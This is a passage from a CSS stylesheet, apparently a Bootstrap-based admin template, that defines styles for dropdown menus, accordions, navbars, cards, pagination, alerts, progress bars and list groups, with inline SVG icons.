.dropdown-item.active, .dropdown-item:active {
  color: #fff;
  text-decoration: none;
  background-color: #2a69b7;
}
.dropdown-item.disabled, .dropdown-item:disabled {
  color: #adb5bd;
  pointer-events: none;
  background-color: transparent;
}

.dropdown-menu.show {
  display: block;
}

.dropdown-header {
  display: block;
  padding: 0 0.75rem;
  margin-bottom: 0;
  font-size: 0.8rem;
  color: #666e76;
  white-space: nowrap;
}

.dropdown-item-text {
  display: block;
  padding: 0.5rem 0.75rem;
  color: #212529;
}

.dropdown-menu-dark {
  color: #dee2e6;
  background-color: #343a40;
  border-color: rgba(0, 0, 0, 0.15);
}
.dropdown-menu-dark .dropdown-item {
  color: #dee2e6;
}
.dropdown-menu-dark .dropdown-item:hover, .dropdown-menu-dark .dropdown-item:focus {
  color: #fff;
  background-color: rgba(255, 255, 255, 0.15);
}
.dropdown-menu-dark .dropdown-item.active, .dropdown-menu-dark .dropdown-item:active {
  color: #fff;
  background-color: #2a69b7;
}
.dropdown-menu-dark .dropdown-item.disabled, .dropdown-menu-dark .dropdown-item:disabled {
  color: #adb5bd;
}
.dropdown-menu-dark .dropdown-divider {
  border-color: rgba(0, 0, 0, 0.15);
}
.dropdown-menu-dark .dropdown-item-text {
  color: #dee2e6;
}
.dropdown-menu-dark .dropdown-header {
  color: #adb5bd;
}

.accordion-button {
  position: relative;
  display: flex;
  align-items: center;
  width: 100%;
  padding: 1rem 1.25rem;
  font-size: 1rem;
  color: var(--template-text-dark);
  text-align: left;
  background-color: #fff;
  border: 0;
  border-radius: 0;
  overflow-anchor: none;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out, border-radius 0.15s ease;
}
@media (prefers-reduced-motion: reduce) {
  .accordion-button {
    transition: none;
  }
}
.accordion-button:not(.collapsed) {
  color: #265fa5;
  background-color: #eaf0f8;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.125);
}
.accordion-button:not(.collapsed)::after {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23265fa5'%3e%3cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");
  -webkit-transform: rotate(-180deg);
          transform: rotate(-180deg);
}
.accordion-button::after {
  flex-shrink: 0;
  width: 1.25rem;
  height: 1.25rem;
  margin-left: auto;
  content: "";
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='var%28--template-text-dark%29'%3e%3cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");
  background-repeat: no-repeat;
  background-size: 1.25rem;
  transition: -webkit-transform 0.2s ease-in-out;
  transition: transform 0.2s ease-in-out;
  transition: transform 0.2s ease-in-out, -webkit-transform 0.2s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .accordion-button::after {
    transition: none;
  }
}
.accordion-button:hover {
  z-index: 2;
}
.accordion-button:focus {
  z-index: 3;
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}

.accordion-header {
  margin-bottom: 0;
}

.accordion-item {
  background-color: #fff;
  border: 1px solid rgba(0, 0, 0, 0.125);
}
.accordion-item:first-of-type {
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}
.accordion-item:first-of-type .accordion-button {
  border-top-left-radius: calc(0.25rem - 1px);
  border-top-right-radius: calc(0.25rem - 1px);
}
.accordion-item:not(:first-of-type) {
  border-top: 0;
}
.accordion-item:last-of-type {
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.accordion-item:last-of-type .accordion-button.collapsed {
  border-bottom-right-radius: calc(0.25rem - 1px);
  border-bottom-left-radius: calc(0.25rem - 1px);
}
.accordion-item:last-of-type .accordion-collapse {
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.accordion-body {
  padding: 1rem 1.25rem;
}

.accordion-flush .accordion-collapse {
  border-width: 0;
}
.accordion-flush .accordion-item {
  border-right: 0;
  border-left: 0;
  border-radius: 0;
}
.accordion-flush .accordion-item:first-child {
  border-top: 0;
}
.accordion-flush .accordion-item:last-child {
  border-bottom: 0;
}
.accordion-flush .accordion-item .accordion-button {
  border-radius: 0;
}

.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-flex;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  flex: 1 1 auto;
}
.btn-group > .btn-check:checked + .btn,
.btn-group > .btn-check:focus + .btn,
.btn-group > .btn:hover,
.btn-group > .btn:focus,
.btn-group > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn-check:checked + .btn,
.btn-group-vertical > .btn-check:focus + .btn,
.btn-group-vertical > .btn:hover,
.btn-group-vertical > .btn:focus,
.btn-group-vertical > .btn:active,
.btn-group-vertical > .btn.active {
  z-index: 1;
}

.btn-toolbar {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-start;
}
.btn-toolbar .input-group {
  width: auto;
}

.btn-group > .btn:not(:first-child),
.btn-group > .btn-group:not(:first-child) {
  margin-left: -1px;
}
.btn-group > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group > .btn-group:not(:last-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn:nth-child(n+3),
.btn-group > :not(.btn-check) + .btn,
.btn-group > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.dropdown-toggle-split {
  padding-right: 0.75rem;
  padding-left: 0.75rem;
}
.dropdown-toggle-split::after, .dropup .dropdown-toggle-split::after, .dropend .dropdown-toggle-split::after {
  margin-left: 0;
}
.dropstart .dropdown-toggle-split::before {
  margin-right: 0;
}

.btn-sm + .dropdown-toggle-split, .btn-group-sm > .btn + .dropdown-toggle-split {
  padding-right: 0.375rem;
  padding-left: 0.375rem;
}

.btn-lg + .dropdown-toggle-split, .btn-group-lg > .btn + .dropdown-toggle-split {
  padding-right: 0.75rem;
  padding-left: 0.75rem;
}

.btn-group-vertical {
  flex-direction: column;
  align-items: flex-start;
  justify-content: center;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group {
  width: 100%;
}
.btn-group-vertical > .btn:not(:first-child),
.btn-group-vertical > .btn-group:not(:first-child) {
  margin-top: -1px;
}
.btn-group-vertical > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group-vertical > .btn-group:not(:last-child) > .btn {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn ~ .btn,
.btn-group-vertical > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}

.nav {
  display: flex;
  flex-wrap: wrap;
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}

.nav-link {
  display: block;
  padding: 0.5rem 1rem;
  color: var(--template-link-color);
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .nav-link {
    transition: none;
  }
}
.nav-link:hover, .nav-link:focus {
  color: var(--template-link-hover-color);
}
.nav-link.disabled {
  color: #666e76;
  pointer-events: none;
  cursor: default;
}

.nav-tabs {
  border-bottom: 1px solid #dee2e6;
}
.nav-tabs .nav-link {
  margin-bottom: -1px;
  background: none;
  border: 1px solid transparent;
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}
.nav-tabs .nav-link:hover, .nav-tabs .nav-link:focus {
  border-color: #e8e8e8 #e8e8e8 #dee2e6;
  isolation: isolate;
}
.nav-tabs .nav-link.disabled {
  color: #666e76;
  background-color: transparent;
  border-color: transparent;
}
.nav-tabs .nav-link.active,
.nav-tabs .nav-item.show .nav-link {
  color: #495057;
  background-color: #fff;
  border-color: #dee2e6 #dee2e6 #fff;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}

.nav-pills .nav-link {
  background: none;
  border: 0;
  border-radius: 0.25rem;
}
.nav-pills .nav-link.active,
.nav-pills .show > .nav-link {
  color: #fff;
  background-color: #2a69b7;
}

.nav-fill > .nav-link,
.nav-fill .nav-item {
  flex: 1 1 auto;
  text-align: center;
}

.nav-justified > .nav-link,
.nav-justified .nav-item {
  flex-basis: 0;
  flex-grow: 1;
  text-align: center;
}

.nav-fill .nav-item .nav-link,
.nav-justified .nav-item .nav-link {
  width: 100%;
}

.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}

.navbar {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  align-items: center;
  justify-content: space-between;
  padding-top: 0.5rem;
  padding-bottom: 0.5rem;
}
.navbar > .container,
.navbar > .container-fluid,
.navbar > .container-sm,
.navbar > .container-md,
.navbar > .container-lg,
.navbar > .container-xl,
.navbar > .container-xxl {
  display: flex;
  flex-wrap: inherit;
  align-items: center;
  justify-content: space-between;
}
.navbar-brand {
  padding-top: 0.3125rem;
  padding-bottom: 0.3125rem;
  margin-right: 1rem;
  font-size: 1.25rem;
  white-space: nowrap;
}
.navbar-nav {
  display: flex;
  flex-direction: column;
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}
.navbar-nav .nav-link {
  padding-right: 0;
  padding-left: 0;
}
.navbar-nav .dropdown-menu {
  position: static;
}

.navbar-text {
  padding-top: 0.5rem;
  padding-bottom: 0.5rem;
}

.navbar-collapse {
  flex-basis: 100%;
  flex-grow: 1;
  align-items: center;
}

.navbar-toggler {
  padding: 0.25rem 0.75rem;
  font-size: 1.25rem;
  line-height: 1;
  background-color: transparent;
  border: 1px solid transparent;
  border-radius: 0.25rem;
  transition: box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .navbar-toggler {
    transition: none;
  }
}
.navbar-toggler:hover {
  text-decoration: none;
}
.navbar-toggler:focus {
  text-decoration: none;
  outline: 0;
  box-shadow: 0 0 0 0.25rem;
}

.navbar-toggler-icon {
  display: inline-block;
  width: 1.5em;
  height: 1.5em;
  vertical-align: middle;
  background-repeat: no-repeat;
  background-position: center;
  background-size: 100%;
}

.navbar-nav-scroll {
  max-height: var(--scroll-height, 75vh);
  overflow-y: auto;
}

@media (min-width: 576px) {
  .navbar-expand-sm {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-sm .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-sm .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-sm .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-sm .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-sm .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-sm .navbar-toggler {
    display: none;
  }
}
@media (min-width: 768px) {
  .navbar-expand-md {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-md .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-md .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-md .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-md .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-md .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-md .navbar-toggler {
    display: none;
  }
}
@media (min-width: 992px) {
  .navbar-expand-lg {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-lg .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-lg .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-lg .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-lg .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-lg .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-lg .navbar-toggler {
    display: none;
  }
}
@media (min-width: 1200px) {
  .navbar-expand-xl {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-xl .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-xl .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-xl .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-xl .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-xl .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-xl .navbar-toggler {
    display: none;
  }
}
@media (min-width: 1400px) {
  .navbar-expand-xxl {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-xxl .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-xxl .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-xxl .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-xxl .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-xxl .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-xxl .navbar-toggler {
    display: none;
  }
}
.navbar-expand {
  flex-wrap: nowrap;
  justify-content: flex-start;
}
.navbar-expand .navbar-nav {
  flex-direction: row;
}
.navbar-expand .navbar-nav .dropdown-menu {
  position: absolute;
}
.navbar-expand .navbar-nav .nav-link {
  padding-right: 0.5rem;
  padding-left: 0.5rem;
}
.navbar-expand .navbar-nav-scroll {
  overflow: visible;
}
.navbar-expand .navbar-collapse {
  display: flex !important;
  flex-basis: auto;
}
.navbar-expand .navbar-toggler {
  display: none;
}

.navbar-light .navbar-brand {
  color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-brand:hover, .navbar-light .navbar-brand:focus {
  color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-nav .nav-link {
  color: rgba(0, 0, 0, 0.55);
}
.navbar-light .navbar-nav .nav-link:hover, .navbar-light .navbar-nav .nav-link:focus {
  color: rgba(0, 0, 0, 0.7);
}
.navbar-light .navbar-nav .nav-link.disabled {
  color: rgba(0, 0, 0, 0.3);
}
.navbar-light .navbar-nav .show > .nav-link,
.navbar-light .navbar-nav .nav-link.active {
  color: rgba(0, 0, 0, 0.9);
}
.navbar-light .navbar-toggler {
  color: rgba(0, 0, 0, 0.55);
  border-color: rgba(0, 0, 0, 0.1);
}
.navbar-light .navbar-toggler-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%280, 0, 0, 0.55%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e");
}
.navbar-light .navbar-text {
  color: rgba(0, 0, 0, 0.55);
}
.navbar-light .navbar-text a,
.navbar-light .navbar-text a:hover,
.navbar-light .navbar-text a:focus {
  color: rgba(0, 0, 0, 0.9);
}

.navbar-dark .navbar-brand {
  color: #fff;
}
.navbar-dark .navbar-brand:hover, .navbar-dark .navbar-brand:focus {
  color: #fff;
}
.navbar-dark .navbar-nav .nav-link {
  color: rgba(255, 255, 255, 0.55);
}
.navbar-dark .navbar-nav .nav-link:hover, .navbar-dark .navbar-nav .nav-link:focus {
  color: rgba(255, 255, 255, 0.75);
}
.navbar-dark .navbar-nav .nav-link.disabled {
  color: rgba(255, 255, 255, 0.25);
}
.navbar-dark .navbar-nav .show > .nav-link,
.navbar-dark .navbar-nav .nav-link.active {
  color: #fff;
}
.navbar-dark .navbar-toggler {
  color: rgba(255, 255, 255, 0.55);
  border-color: rgba(255, 255, 255, 0.1);
}
.navbar-dark .navbar-toggler-icon {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3e%3cpath stroke='rgba%28255, 255, 255, 0.55%29' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3e%3c/svg%3e");
}
.navbar-dark .navbar-text {
  color: rgba(255, 255, 255, 0.55);
}
.navbar-dark .navbar-text a,
.navbar-dark .navbar-text a:hover,
.navbar-dark .navbar-text a:focus {
  color: #fff;
}

.card {
  position: relative;
  display: flex;
  flex-direction: column;
  min-width: 0;
  word-wrap: break-word;
  background-color: #fff;
  background-clip: border-box;
  border: 0 solid transparent;
  border-radius: 0.25rem;
}
.card > hr {
  margin-right: 0;
  margin-left: 0;
}
.card > .list-group {
  border-top: inherit;
  border-bottom: inherit;
}
.card > .list-group:first-child {
  border-top-width: 0;
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}
.card > .list-group:last-child {
  border-bottom-width: 0;
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.card > .card-header + .list-group,
.card > .list-group + .card-footer {
  border-top: 0;
}

.card-body {
  flex: 1 1 auto;
  padding: 1rem 1rem;
}

.card-title {
  margin-bottom: 0.5rem;
}

.card-subtitle {
  margin-top: -0.25rem;
  margin-bottom: 0;
}

.card-text:last-child {
  margin-bottom: 0;
}

.card-link:hover {
  text-decoration: none;
}
.card-link + .card-link {
  margin-left: 1rem;
}

.card-header {
  padding: 0.5rem 1rem;
  margin-bottom: 0;
  background-color: rgba(0, 0, 0, 0.03);
  border-bottom: 0 solid transparent;
}
.card-header:first-child {
  border-radius: 0.25rem 0.25rem 0 0;
}

.card-footer {
  padding: 0.5rem 1rem;
  background-color: rgba(0, 0, 0, 0.03);
  border-top: 0 solid transparent;
}
.card-footer:last-child {
  border-radius: 0 0 0.25rem 0.25rem;
}

.card-header-tabs {
  margin-right: -0.5rem;
  margin-bottom: -0.5rem;
  margin-left: -0.5rem;
  border-bottom: 0;
}

.card-header-pills {
  margin-right: -0.5rem;
  margin-left: -0.5rem;
}

.card-img-overlay {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  padding: 1rem;
  border-radius: 0.25rem;
}

.card-img,
.card-img-top,
.card-img-bottom {
  width: 100%;
}

.card-img,
.card-img-top {
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}

.card-img,
.card-img-bottom {
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.card-group > .card {
  margin-bottom: 1rem;
}
@media (min-width: 576px) {
  .card-group {
    display: flex;
    flex-flow: row wrap;
  }
  .card-group > .card {
    flex: 1 0 0%;
    margin-bottom: 0;
  }
  .card-group > .card + .card {
    margin-left: 0;
    border-left: 0;
  }
  .card-group > .card:not(:last-child) {
    border-top-right-radius: 0;
    border-bottom-right-radius: 0;
  }
  .card-group > .card:not(:last-child) .card-img-top,
.card-group > .card:not(:last-child) .card-header {
    border-top-right-radius: 0;
  }
  .card-group > .card:not(:last-child) .card-img-bottom,
.card-group > .card:not(:last-child) .card-footer {
    border-bottom-right-radius: 0;
  }
  .card-group > .card:not(:first-child) {
    border-top-left-radius: 0;
    border-bottom-left-radius: 0;
  }
  .card-group > .card:not(:first-child) .card-img-top,
.card-group > .card:not(:first-child) .card-header {
    border-top-left-radius: 0;
  }
  .card-group > .card:not(:first-child) .card-img-bottom,
.card-group > .card:not(:first-child) .card-footer {
    border-bottom-left-radius: 0;
  }
}

.breadcrumb {
  display: flex;
  flex-wrap: wrap;
  padding: 0 0;
  margin-bottom: 1rem;
  list-style: none;
  background-color: var(--white);
}

.breadcrumb-item + .breadcrumb-item {
  padding-left: 0.5rem;
}
.breadcrumb-item + .breadcrumb-item::before {
  float: left;
  padding-right: 0.5rem;
  color: #666e76;
  content: var(--breadcrumb-divider, "/") /* rtl: var(--breadcrumb-divider, "/") */;
}
.breadcrumb-item.active {
  color: #666e76;
}

.pagination {
  display: flex;
  padding-left: 0;
  list-style: none;
}

.page-link {
  position: relative;
  display: block;
  color: var(--template-link-color);
  background-color: #fff;
  border: 1px solid #dee2e6;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .page-link {
    transition: none;
  }
}
.page-link:hover {
  z-index: 2;
  color: var(--template-link-hover-color);
  background-color: #e8e8e8;
  border-color: #dee2e6;
}
.page-link:focus {
  z-index: 3;
  color: var(--template-link-hover-color);
  background-color: #e8e8e8;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}

.page-item:not(:first-child) .page-link {
  margin-left: -1px;
}
.page-item.active .page-link {
  z-index: 3;
  color: #fff;
  background-color: #2a69b7;
  border-color: #2a69b7;
}
.page-item.disabled .page-link {
  color: #666e76;
  pointer-events: none;
  background-color: #fff;
  border-color: #dee2e6;
}

.page-link {
  padding: 0.375rem 0.75rem;
}

.page-item:first-child .page-link {
  border-top-left-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.page-item:last-child .page-link {
  border-top-right-radius: 0.25rem;
  border-bottom-right-radius: 0.25rem;
}

.pagination-lg .page-link {
  padding: 0.75rem 1.5rem;
  font-size: 1.25rem;
}
.pagination-lg .page-item:first-child .page-link {
  border-top-left-radius: 0.3rem;
  border-bottom-left-radius: 0.3rem;
}
.pagination-lg .page-item:last-child .page-link {
  border-top-right-radius: 0.3rem;
  border-bottom-right-radius: 0.3rem;
}

.pagination-sm .page-link {
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
}
.pagination-sm .page-item:first-child .page-link {
  border-top-left-radius: 0.2rem;
  border-bottom-left-radius: 0.2rem;
}
.pagination-sm .page-item:last-child .page-link {
  border-top-right-radius: 0.2rem;
  border-bottom-right-radius: 0.2rem;
}

.badge {
  display: inline-block;
  padding: 0.3rem 0.2rem;
  font-size: 0.75rem;
  font-weight: 700;
  line-height: 1;
  color: #fff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: 0.2rem;
}
.badge:empty {
  display: none;
}

.btn .badge {
  position: relative;
  top: -1px;
}

.alert {
  position: relative;
  padding: 1rem 1rem;
  margin-bottom: 1rem;
  border: 1px solid transparent;
  border-radius: 0.25rem;
}

.alert-heading {
  color: inherit;
}

.alert-link {
  font-weight: 700;
}

.alert-dismissible {
  padding-right: 3rem;
}
.alert-dismissible .btn-close {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  padding: 1.25rem 1rem;
}

.alert-primary {
  color: #0b1c32;
  background-color: #d0d5dd;
  border-color: #b8c1cb;
}
.alert-primary .alert-link {
  color: #091628;
}

.alert-secondary {
  color: #2c3034;
  background-color: #dbdcdd;
  border-color: #c8cbcd;
}
.alert-secondary .alert-link {
  color: #23262a;
}

.alert-success {
  color: #294b32;
  background-color: #dae5dd;
  border-color: #c7d8cc;
}
.alert-success .alert-link {
  color: #213c28;
}

.alert-info {
  color: #193f6e;
  background-color: #d4e1f1;
  border-color: #bfd2ea;
}
.alert-info .alert-link {
  color: #143258;
}

.alert-warning {
  color: #664808;
  background-color: #fff0d0;
  border-color: #ffe9b9;
}
.alert-warning .alert-link {
  color: #523a06;
}

.alert-danger {
  color: #761817;
  background-color: #f3d4d4;
  border-color: #eebfbe;
}
.alert-danger .alert-link {
  color: #5e1312;
}

.alert-light {
  color: #636464;
  background-color: #fefefe;
  border-color: #fdfdfe;
}
.alert-light .alert-link {
  color: #4f5050;
}

.alert-dark {
  color: #141619;
  background-color: #d3d3d4;
  border-color: #bcbebf;
}
.alert-dark .alert-link {
  color: #101214;
}

.alert-atum-link-color {
  color: #193f6e;
  background-color: #d4e1f1;
  border-color: #bfd2ea;
}
.alert-atum-link-color .alert-link {
  color: #143258;
}

.alert-atum-text-dark {
  color: #2c3034;
  background-color: #dbdcdd;
  border-color: #c8cbcd;
}
.alert-atum-text-dark .alert-link {
  color: #23262a;
}

.alert-action {
  color: #0b1c32;
  background-color: #d0d5dd;
  border-color: #b8c1cb;
}
.alert-action .alert-link {
  color: #091628;
}

.alert-error {
  color: #230807;
  background-color: #d8cfce;
  border-color: #c4b6b6;
}
.alert-error .alert-link {
  color: #1c0606;
}

.alert-alert-success {
  color: #091c14;
  background-color: #cfd5d3;
  border-color: #b7c1bc;
}
.alert-alert-success .alert-link {
  color: #071610;
}

@-webkit-keyframes progress-bar-stripes {
  0% {
    background-position-x: 1rem;
  }
}

@keyframes progress-bar-stripes {
  0% {
    background-position-x: 1rem;
  }
}
.progress {
  display: flex;
  height: 1rem;
  overflow: hidden;
  font-size: 0.75rem;
  background-color: #e8e8e8;
  border-radius: 0.25rem;
}

.progress-bar {
  display: flex;
  flex-direction: column;
  justify-content: center;
  overflow: hidden;
  color: #fff;
  text-align: center;
  white-space: nowrap;
  background-color: #2a69b7;
  transition: width 0.6s ease;
}
@media (prefers-reduced-motion: reduce) {
  .progress-bar {
    transition: none;
  }
}

.progress-bar-striped {
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 1rem 1rem;
}

.progress-bar-animated {
  -webkit-animation: 1s linear infinite progress-bar-stripes;
          animation: 1s linear infinite progress-bar-stripes;
}
@media (prefers-reduced-motion: reduce) {
  .progress-bar-animated {
    -webkit-animation: none;
            animation: none;
  }
}

.list-group {
  display: flex;
  flex-direction: column;
  padding-left: 0;
  margin-bottom: 0;
  border-radius: 0.25rem;
}

.list-group-numbered {
  list-style-type: none;
  counter-reset: section;
}
.list-group-numbered > li::before {
  content: counters(section, ".") ". ";
  counter-increment: section;
}

.list-group-item-action {
  width: 100%;
  color: #495057;
  text-align: inherit;
}
.list-group-item-action:hover, .list-group-item-action:focus {
  z-index: 1;
  color: #495057;
  text-decoration: none;
  background-color: #f8f9fa;
}
.list-group-item-action:active {
  color: var(--template-text-dark);
  background-color: #e8e8e8;
}

.list-group-item {
  position: relative;
  display: block;
  padding: 0.75rem 1rem;
  color: #212529;
  background-color: var(--white-offset);
  border: 1px solid hsl(var(--hue), 40%, 85%);
}
.list-group-item:first-child {
  border-top-left-radius: inherit;
  border-top-right-radius: inherit;
}
.list-group-item:last-child {
  border-bottom-right-radius: inherit;
  border-bottom-left-radius: inherit;
}
.list-group-item.disabled, .list-group-item:disabled {
  color: #666e76;
  pointer-events: none;
  background-color: var(--white-offset);
}
.list-group-item.active {
  z-index: 2;
  color: #fff;
  background-color: #2a69b7;
  border-color: #2a69b7;
}
.list-group-item + .list-group-item {
  border-top-width: 0;
}
.list-group-item + .list-group-item.active {
  margin-top: -1px;
  border-top-width: 1px;
}

.list-group-horizontal {
  flex-direction: row;
}
.list-group-horizontal > .list-group-item:first-child {
  border-bottom-left-radius: 0.25rem;
  border-top-right-radius: 0;
}
.list-group-horizontal > .list-group-item:last-child {
  border-top-right-radius: 0.25rem;
  border-bottom-left-radius: 0;
}
.list-group-horizontal > .list-group-item.active {
  margin-top: 0;
}
.list-group-horizontal > .list-group-item + .list-group-item {
  border-top-width: 1px;
  border-left-width: 0;
}
.list-group-horizontal > .list-group-item + .list-group-item.active {
  margin-left: -1px;
  border-left-width: 1px;
}

@media (min-width: 576px) {
  .list-group-horizontal-sm {
    flex-direction: row;
  }
  .list-group-horizontal-sm > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-sm > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-sm > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-sm > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-sm > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 768px) {
  .list-group-horizontal-md {
    flex-direction: row;
  }
  .list-group-horizontal-md > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-md > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-md > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-md > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-md > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 992px) {
  .list-group-horizontal-lg {
    flex-direction: row;
  }
  .list-group-horizontal-lg > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-lg > .list-group-item:last-child {
    border-top-right-radius: 0.25rem;
    border-bottom-left-radius: 0;
  }
  .list-group-horizontal-lg > .list-group-item.active {
    margin-top: 0;
  }
  .list-group-horizontal-lg > .list-group-item + .list-group-item {
    border-top-width: 1px;
    border-left-width: 0;
  }
  .list-group-horizontal-lg > .list-group-item + .list-group-item.active {
    margin-left: -1px;
    border-left-width: 1px;
  }
}
@media (min-width: 1200px) {
  .list-group-horizontal-xl {
    flex-direction: row;
  }
  .list-group-horizontal-xl > .list-group-item:first-child {
    border-bottom-left-radius: 0.25rem;
    border-top-right-radius: 0;
  }
  .list-group-horizontal-xl > .list-group-item:last-child {
